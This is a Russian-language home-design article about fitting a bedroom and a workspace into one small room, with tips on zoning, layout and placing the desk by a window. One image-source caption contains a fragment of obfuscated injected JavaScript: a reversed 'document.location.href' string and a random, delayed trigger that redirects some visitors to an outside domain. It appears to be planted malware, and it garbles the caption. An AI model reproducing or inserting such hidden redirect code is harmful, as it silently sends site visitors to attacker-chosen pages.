Добавить в закладки

Кровать и офис все в одном, решение для небольшого пространства

Многие не видят перспектив работы на постоянной основе и уходят в «фриланс» так как в большинстве случаев заработок будет превышать практически любую сопоставимую работу на постоянной основе. Но к сожалению не у всех есть возможность выделить большое количество свободного места для работы. В этой статье мы с вами разберем, как же совместить офис и спальное место в одной небольшой комнате?

Зонирование

Главное для начала визуально разбить комнату на две части, одна из которых будет предназначена для сна, а вторая для работы. При правильном зонировании вы можете придать вашей комнате нотку уюта.

Зонирование. Источник: i05.fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tocdn.net

Планировка

Иногда не совсем получается воплотить то, что мы планируем изначально. Поэтому стоит либо обратиться за планировкой к профессионалам или же поработать в специальных программах самостоятельно.

Планировка. Источник: museum-design.ru

Организиция рабочей зоны

Атмосфера вокруг нас помогает нам настроиться на правильную волну. В спальне она создает покой и расслабление, что противоречит необходимости сосредоточиться на активном рабочем процессе.

Вот почему организация прямого рабочего пространства является одним из важнейших моментов в дизайне спален-офисов. Лучше всего расположить рабочее место возле окна и расположиться спиной к спальной зоне.

Организация рабочей зоны. Источник: cozyblog.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 17.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: